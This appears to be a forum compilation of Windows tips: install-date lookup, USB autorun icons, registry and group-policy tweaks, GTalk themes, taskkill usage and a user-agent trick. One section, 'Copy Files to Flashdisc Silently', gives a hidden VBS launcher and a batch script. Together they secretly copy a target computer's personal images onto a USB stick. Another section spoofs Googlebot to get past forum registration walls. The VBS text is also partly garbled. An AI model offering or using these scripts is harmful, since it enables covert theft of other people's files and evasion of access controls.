Find installation date

Goto Start->RUN->CMD
and type the following:

systeminfo | find /i "install date"

This command pipes the output of the systeminfo.exe command into the find.exe command to locate the line of text that contains the string "install date" and displays the result

Customise your USB memory stick

Open Notepad and type in the following

[autorun]

icon = *******.ico

label = *******

Change the ***** next to icon to what ever the icon is you want to use
ie. monkey.ico

Change the ***** next to label to whatever you want to name your USB stick
ie. Monkeyweasels USB

so using my examples you end up with:

[autorun]

icon = monkey.ico

label = Monkeyweasels USB

Now save this on the root of your USB Drive with the name

autorun.inf

Also place the icon you chose to use in the Root of your USB Drive

Next time you plug in your USB Drive it will appear with the new icon and name

Hide them by...

* right-clicking both inf file and icon
* choosing Properties...
* then tick the box entitled Hidden and
* Click OK

Block USB Drive (A Registry Tweak)

To this what can be done is that the USB can be blocked and then stopping the use of USB drives. Here is a simple registry hack to do so, try it with care.

1. Go to Start –> Run, type Regedit.
2. Go to HKEY_LOCAL_MACHINE\System\CurrentControlset\Servic es\USBStor
3. In the right pane, look for value Start and have value as 0000000(3)
4. Double click on that and change that value to 4.

You might be required to restart the PC, and then you are done with it, USB is now blocked.

In case if you want to get the USB unblocked, just change the value again to 3

lock the 'TASKBAR'

Go to run. type 'gpedit.msc'. From there, Local computer policy>user configuration>Administrative templates>Systems>Alt+Ctrl+Del options>Remove task manager>Enabled.

u r done

HIDE USER ACCOUNTS FROM CONTROL PANEL

To Hide Perform the following Steps
Go to Start/Run, and type:
GPEDIT.MSC
Open the path
User Config > Admin Templates > Control Panel
doubleclick "Hide specified Control Panel applets"
now select 'enabled', then click 'Show"
click Add button,
type "nusrmgt.cpl" into the add box and click Ok..Now you can't see the User Accounts in the control panel

Copy Files to Flashdisc Silently

Tricks To Copy Data Flash Disk-Still In Silence
1. Open notepad, create a vbs file type or copy and paste the following script:
dim wshshell, dos
wscript.createobject set wshshell = ( "wscript.shell")
dos = wshshell.expandenvironmentstr ings ( "% coms ...
wshshell.run (dos & "/ c tarik.bat"), vbhide
2. Save as all files with start.vbs name
3. Open notepad again, make a bat file type or copy and paste the following script:
@ echo off
mkdir% computername%
xcopy "C: \ Documents and Settings \% username% \ My Documents \ *. jpg"% computername% / s / c / q / r
@ cls
@ exit
4. Save the file name tarik.bat save as type select all files.
Bat file name should be in accordance with the vbs script file line to four (tarik.bat)
Save the file in the flash disk, copy files to the target computer secretly run (2x click) file start.vbs.
Vbs file function (start.vbs) function to run a bat file (tarik.bat) secretly term or background process. While the bat file (tarik.bat) function to run the copy all files with a certain extensions in the target computer.
Example above is a copy of all the files jpg extension(image file) is in the My Documents folder on the target computer (see the third line script bat file) and saved into the flash disk into the appropriate folder with the name of the target computer. you can edit their own page on the second file format as needed files and folders on the target you will copy.

Create Gtalk Themes

Here I am going to tell you that how you can create your own GTalk themes.

So let start :


First open your C drive and go to Tools, in the upper horizontal bar and select Folder Options. In the View tab put a tick on Show Hidden Files and Folders and click on Apply and then OK. After doing this navigate to

C>>Documents and Settings>>profile name>>Local Settings>>Application Data>>Google>>Google Talk>>themes>>system>>chat

In the Chat folder you will see about 10-11 default themes. Now select a particular theme and double click on it and go to Contents>>Resources

In the Resources folder you will see main.css file. The main.css is the file which helps in defining the look of the GTalk theme.

Now to create your own theme you have to edit main.css file. Just open it with Notepad and you can add your own images, change colours and can do alot of changes.

After editing open your GTalk and go to Settings>>Appearance and select the theme you have edited

MS OFFICE Word 2007 Voice Command

Use a Voice Command
You can use sound in Microsoft Office Word.

1. In the Word document, place your cursor where you want your voice message to go.
2. Click Insert, and then in the Text section, click the Insert Object button.
3. In the Object dialog box, on the Create New tab, in the list of object types, select Wave Sound.
4. Click OK, and then record your own voice note.

Kill Processes from Command Prompt

I'm sure you are familiar with the traditional way to kill or end a process in Windows using Task Manager. This method is effective but not nearly as fun as killing a process in Command Prompt. Additionally, killing processes in Command Prompt provides much more control and the ability to end multiple processes at once.

All of this is possible with the TaskKill command. First, let's cover the basics. You can kill a process by the process ID (PID) or by image name (EXE filename).

Open up an Administrative level Command Prompt and run tasklist to see all of the running processes:

C:\>tasklist

Image Name PID Session Name Mem Usage
=========== ============== ========
firefox.exe 26356 Console 139,352 K
regedit.exe 24244 Console 9,768 K
cmd.exe 18664 Console 2,380 K
conhost.exe 2528 Console 7,852 K
notepad.exe 17364 Console 7,892 K
notepad.exe 24696 Console 22,028 K
notepad.exe 25304 Console 5,852 K
explorer.exe 2864 Console 72,232 K
In the example above you can see the image name and the PID for each process. If you want to kill the firefox process run:

C:\>Taskkill /IM firefox.exe /F

or
C:\>Taskkill /PID 26356 /F

The /f flag is kills the process forcefully. Failure to use the /F flag will result in nothing happening in some cases. One example is whenever I want to kill the explorer.exe process I have to use the /F flag or else the process just does not terminate.

If you have multiple instances of an image open such as multiple firefox.exe processes, running the taskkill /IM firefox.exe command will kill all instances. When you specify the PID only the specific instane of firefox will be terminated.

The real power of taskkill are the filtering options that allow you to use the following variables and operators.

Variables:

*STATUS
* IMAGENAME
* PID
* SESSION
* CPUTIME
* MEMUSAGE
* USERNAME
* MODULES
* SERVICES
* WINDOWTITLE

Operators:

* eq (equals)
* ne (not equal)
* gt (greater than)
* lt (less than)
* ge (greater than or equal)
* le (less than or equal)

"*" is the wildcard.

You can use the variables and operators with the /FI filtering flag. For example, let's say you want to end all processes that have a window title that starts with "Internet":
C:\>taskkill /FI "WINDOWTITLE eq Internet*" /F

To learn more about taskkill run it with the /? command just like any other Windows command

Enter and Browse any Forum without registering

Whenever you need any information for which you are eager to know about and then Forum will ask you to register and login and then only you will be able to see that thing. You will probably find some another alternative rather than registering (then let it be free!) to any website. After registering, there is no guarantee to get complete and correct information so, why not try to get in and browse everything without registering?

These websites generally doesn’t allow unregistered users or guests to enter but they do allow “Google Bot” or any other search engine bot to enter for crawling purposes

You will need to change user agent to Google bot for browsing forums.

What you need is Firefox Browser and User Agent Switcher [Serch On Google] After installing, create another user agent from the options menu of the addon.
Select User Agent from the left sidebar and click Add. Now in the description field type:


Code:

Quote:
crawl-66-249-66-1.googlebot.com

and in user agent field type:

Code:

Quote:
Googlebot/2.1 (+http://www.googlebot.com/bot.html)

Now Start browsing by selecting the user agent as Google Bot.